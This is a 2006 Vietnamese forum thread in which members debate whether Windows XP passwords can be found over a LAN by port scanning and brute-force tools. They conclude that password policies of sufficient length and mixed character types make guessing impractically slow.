Đối với bài viết thứ nhất, trong cách 2, mình thấy không hợp lý ở chỗ là, sau khi biết được một cổng đang mở, telnet vào có giải quyết được vấn đề gì không? Vì thực ra telnet cũng chỉ nối socket đến một cổng đang mở của một dịch vụ, việc giao tiếp sau đó phải theo giao thức, theo các hàm API của dịch vụ đó. Chẳng hạn bạn thử quét cổng 80 đến IP của một Web server xem có được không? Và sau đó thì làm được gì? Thậm chí là có thể telnet được đến các cổng 22 hoặc 23 của Telnet hoặc SSH( và các dịch vụ cho phép remote control khác) đi nữa, cũng phải làm thể nào để biết được user/pass thì mới đến được bước tiếp theo.
Không bàn đến việc làm sao để lấy được danh sách các user của hệ thống, chúng ta hãy nói đến việc làm sao để dò, quét được pass của một user. Theo tôi biết thì các tool để quét được pass cũng chỉ dựa trên một sô bước cơ bản, theo một từ điển gồm các khả năng có thể xảy ra nhất, còn sau đấy thì cũng phải quét hết các trường hợp có thể xảy ra : pass có chiều dài là n ký tự, các trường hợp có thể xảy ra đối với mỗi ký tự đó là…
Để dò được pass được đặt theo các policy về chiểu dài, đủ các ký tự hoa, thường, chữ số,.. tôi nghĩ chắc đến đời con cháu chúng ta may ra mới có được kết quả.
Tôi nghĩ có cách để thử nghiệm: có một số tài liệu về cách đặt password sao cho khó bị dò, hoặc tham khảo cách đặt theo các policy về chiều dài tối thiểu và đủ các ký tự hoa thường, chữ số, sau đó thử dùng các cách mà bạn tham khảo được ở trên, và thử dò xem mất bao lâu thì có được kết quả?
Cảm ơn.

[Question] Re: Tìm Pass và Use của XP qua mạng Lan	10/08/2006 22:21:43 (+0700) \| #29 \| 13792

thang2rs
Member

Joined: 06/07/2006 18:45:35
Messages: 46
Offline

Tôi chưa bao giờ hack nhưng kinh nghiệm của nhiều năm làm máy tính cho thấy mọi thứ không đơn giản như thế.

Chung quy là phải tìm được password của một user qua các tool quét.
Đối với bài viết thứ nhất, trong cách 2, mình thấy không hợp lý ở chỗ là, sau khi biết được một cổng đang mở, telnet vào có giải quyết được vấn đề gì không? Vì thực ra telnet cũng chỉ nối socket đến một cổng đang mở của một dịch vụ, việc giao tiếp sau đó phải theo giao thức, theo các hàm API của dịch vụ đó. Chẳng hạn bạn thử quét cổng 80 đến IP của một Web server xem có được không? Và sau đó thì làm được gì? Thậm chí là có thể telnet được đến các cổng 22 hoặc 23 của Telnet hoặc SSH( và các dịch vụ cho phép remote control khác) đi nữa, cũng phải làm thể nào để biết được user/pass thì mới đến được bước tiếp theo.
Không bàn đến việc làm sao để lấy được danh sách các user của hệ thống, chúng ta hãy nói đến việc làm sao để dò, quét được pass của một user. Theo tôi biết thì các tool để quét được pass cũng chỉ dựa trên một sô bước cơ bản, theo một từ điển gồm các khả năng có thể xảy ra nhất, còn sau đấy thì cũng phải quét hết các trường hợp có thể xảy ra : pass có chiều dài là n ký tự, các trường hợp có thể xảy ra đối với mỗi ký tự đó là…
Để dò được pass được đặt theo các policy về chiểu dài, đủ các ký tự hoa, thường, chữ số,.. tôi nghĩ chắc đến đời con cháu chúng ta may ra mới có được kết quả.
Tôi nghĩ có cách để thử nghiệm: có một số tài liệu về cách đặt password sao cho khó bị dò, hoặc tham khảo cách đặt theo các policy về chiều dài tối thiểu và đủ các ký tự hoa thường, chữ số, sau đó thử dùng các cách mà bạn tham khảo được ở trên, và thử dò xem mất bao lâu thì có được kết quả?

Hoàn toàn chính xác.

"NET" mà bạn dùng do Windows cung cấp. Đây thuần tuý là công cụ mạng, được dùng hoàn toàn "chính qui", chẳng liên quan gì đến hack cả (thậm chí có thể xem là yếu nữa do thiếu GUI).

Chung quy là phải tìm được password của một user qua các tool quét.

Vấn đề là ở đây. Một khi đã có password của một account nào đó (tốt nhất là account thuộc nhóm Administrators) thì... chẳng còn gì để bàn nữa!

Các tool quyét mà bạn đề cập dùng phương pháp thử và sai để dò password, bắt đầu từ những chuỗi có nhiều khả năng nhất, một cách tự động. Có thể đây là các tool tốt nhưng chúng cũng chỉ làm được đến thế.

Tất nhiên bạn có thể xâm nhập vào một máy tính nào đó bằng cách này nhưng rõ ràng là máy tính này đã không được bảo vệ hoặc bảo vệ quá sơ sài. Trong trường hợp này bạn đã khai thác được điểm yếu của người dùng máy tính hơn là chính chiếc máy tính đó. Và như vậy, về mặt kĩ thuật, chẳng có gì đáng học hỏi cả.

Tôi nghĩ có cách để thử nghiệm: có một số tài liệu về cách đặt password sao cho khó bị dò, hoặc tham khảo cách đặt theo các policy về chiều dài tối thiểu và đủ các ký tự hoa thường, chữ số, sau đó thử dùng các cách mà bạn tham khảo được ở trên, và thử dò xem mất bao lâu thì có được kết quả?

Đúng. Tất cả các phép thử đều thông qua mạng (không dưới 0.5s cho 1 phép thử trên mạng LAN). Có thể bạn phải "di chúc" chúng cho đời con của bạn đấy chứ smilie

[Question] Re: Tìm Pass và Use của XP qua mạng Lan	10/08/2006 22:36:24 (+0700) \| #30 \| 13797

cuonghm
Member

Joined: 08/08/2006 22:12:59
Messages: 8
Offline

to thang2rs:
Tôi đang nói về ý nghĩ về việc lấy mật khẩu của 1 User( có thể là admin hoặc bất ký) trên Windows của bác ngochoan2003. Vì theo như bác ấy, như các bài trích dẫn thêm của bác ấy, thì thâm nhập là khả thi và có nhiều cách.
Sau khi đọc bài của bác thang2rs, tôi không hiểu là quan điểm của bài reply đang nói về vấn đề của bác ngochoan2003 hay về quan điểm của tôi hay là về quan đỉêm của bác trong vấn đề này?

Go to:

Users currently in here
1 Anonymous